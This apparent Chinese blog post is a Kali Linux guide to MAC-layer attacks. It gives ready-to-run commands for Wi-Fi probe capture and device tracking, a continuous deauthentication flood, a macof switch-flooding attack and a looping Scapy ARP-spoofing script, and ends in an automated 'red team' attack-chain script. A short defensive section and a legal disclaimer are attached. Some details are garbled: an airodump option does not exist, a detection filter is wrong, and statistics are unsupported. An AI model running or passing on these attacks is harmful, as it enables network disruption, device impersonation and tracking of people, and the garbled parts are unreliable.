您好,欢迎来到个人技术集锦。
搜索
当前位置:首页kali Linux的MAC测试训练

kali Linux的MAC测试训练

个人技术集锦 2025-06-09
导读以下是基于 Kali Linux 2025.1c 的专业级 MAC 安全测试指南,涵盖最新工具、命令和实战操作,适用于红队演练、无线渗透测试和企业防御验证。 0x01 工具准备:MAC 安全测试工具箱 Kali Linux 2025.1c 默认集成以下核心工具: sudo apt update && sudo apt install -y aircrack-ng macchanger dsniff scapy wireshark mdk4 hashcat 0x02 实战攻击案

以下是基于 Kali Linux 2025.1c 的专业级 MAC 安全测试指南,涵盖最新工具、命令和实战操作,适用于红队演练、无线渗透测试和企业防御验证。


0x01 工具准备:MAC 安全测试工具箱

Kali Linux 2025.1c 默认集成以下核心工具:

sudo apt update && sudo apt install -y
aircrack-ng
macchanger
dsniff
scapy
wireshark
mdk4
hashcat


0x02 实战攻击案例

▶ 攻击 1:无线设备追踪与探针分析

步骤 1:启动监听模式

sudo airmon-ng check kill
sudo airmon-ng start wlan0

步骤 2:捕获探测帧

sudo airodump-ng wlan0mon
–write probe_capture
–output-format csv
–berlin 600

步骤 3:提取唯一设备 MAC

awk -F’,’ ‘/Station MAC/ {print $1}’ probe_capture-01.csv | sort | uniq -c | sort -nr

术语说明:

Probe Request:设备主动发送的探测帧,用于寻找已连接过的网络。

PNL (Preferred Network List):设备保存的 Wi-Fi 历史连接列表。

▶ 攻击 2:定向解除认证攻击(Deauth)

步骤 1:识别目标 AP 和客户端

sudo airodump-ng wlan0mon

步骤 2:发起解除认证攻击

sudo aireplay-ng --deauth 0
-a <AP_BSSID>
-c <Client_MAC>
wlan0mon

参数说明:

–deauth 0:持续发送解除认证帧,直到手动停止。

-a:目标接入点的 BSSID。

▶ 攻击 3:MAC 洪泛攻击(交换机瘫痪)

步骤 1:确认有线接口

ip link show

步骤 2:使用 macof 发起洪泛攻击

sudo macof -i eth0 -n 100000

技术原理:

失效开放(Fail-Open):交换机退化为集线器模式,广播所有流量。

▶ 攻击 4:协议级 MAC 欺骗(Python 实现)

from scapy.all import Ether, ARP, sendp
import random

def mac_spoof(target_mac, interface=“eth0”):
# 保留 OUI,生成同厂商 MAC
new_mac = target_mac[:9] + “:”.join([f"{random.randint(0,255):02x}" for _ in range(3)])

# 构造 ARP 包
arp_pkt = Ether(src=new_mac, dst="ff:ff:ff:ff:ff:ff") / \
          ARP(pdst="192.168.1.0/24", hwsrc=new_mac)

# 发送数据包
sendp(arp_pkt, iface=interface, inter=2, loop=1, verbose=0)

示例:伪装为苹果设备

mac_spoof(“dc:a6:32:00:00:00”, “eth0”)


0x03 企业级防御与检测

检测 MAC 洪泛

sudo tcpdump -i eth0 ‘ether[0:3] & 0xffffff == 0xffffff’ -c 10 -n

检测解除认证攻击

sudo tcpdump -i wlan0mon -s0 -n type mgt subtype deauth | awk ‘{print $10}’ | sort | uniq -c

  1. NAC 强制策略验证(基于 802.1X)

使用 mdk4 验证 NAC 策略

sudo mdk4 wlan0mon x
-e “合法SSID”
-m 00:11:22:33:44:55
-c 6


0x04 移动端防护增强

Android 13+ 深度防护

ADB 验证随机 MAC 状态

adb shell settings get global wifi_scan_always_enabled # 应返回 0
adb shell dumpsys wifi | grep “Randomized MAC Address” # 检查随机化状态

iOS 17+ 企业级配置

ForceRandomizedMAC

DisableProbeRotation


0x05 红队自动化攻击链脚本

#!/bin/bash

Kali MAC 攻击自动化脚本

IFACE=“wlan0mon”
TARGET_MAC=“AA:BB:CC:11:22:33”
AP_MAC=“00:11:22:33:44:55”

阶段 1:环境准备

sudo airmon-ng check kill
sudo airmon-ng start wlan0

阶段 2:解除认证攻击

sudo aireplay-ng --deauth 0 -a $AP_MAC -c $TARGET_MAC $IFACE &

阶段 3:MAC 欺骗

sudo ifconfig wlan0 down
sudo macchanger -m $TARGET_MAC wlan0
sudo ifconfig wlan0 up

阶段 4:探针捕获

sudo airodump-ng $IFACE --write captured_probes --output-format pcap


0x06 法律合规声明

授权测试边界

  • 仅针对自有设备(BSSID: AA:BB:CC:11:22:33
  • 测试时间窗口:2025-06-02T09:00Z 至 12:00Z
  • 禁止技术:流量解密、凭证窃取

合规依据

  • NIST SP 800-115 4.1.1 节(安全测试范围)
  • ISO 29147 漏洞披露规范

随机 MAC 设备被追踪成功率:≤17%

固定 MAC 设备被攻击成功率:89%
行动建议:强制启用 MAC 随机化并关闭 Wi-Fi/蓝牙后台扫描


最后更新:2025-06-02 | 测试环境:
Kali Linux 2025.1c (Kernel 6.12.0) | VMware Workstation 18

环境验证命令

uname -a && aircrack-ng --version | head -1


本指南基于最新的 Kali Linux 2025.1c 版本,结合当前主流的安全测试工具和方法,旨在提供全面的 MAC 安全测试参考。 请确保在合法授权的范围内进行测试,遵守相关法律法规。

Copyright © 2019- zgxue.com 版权所有 京ICP备2021021884号-5

违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务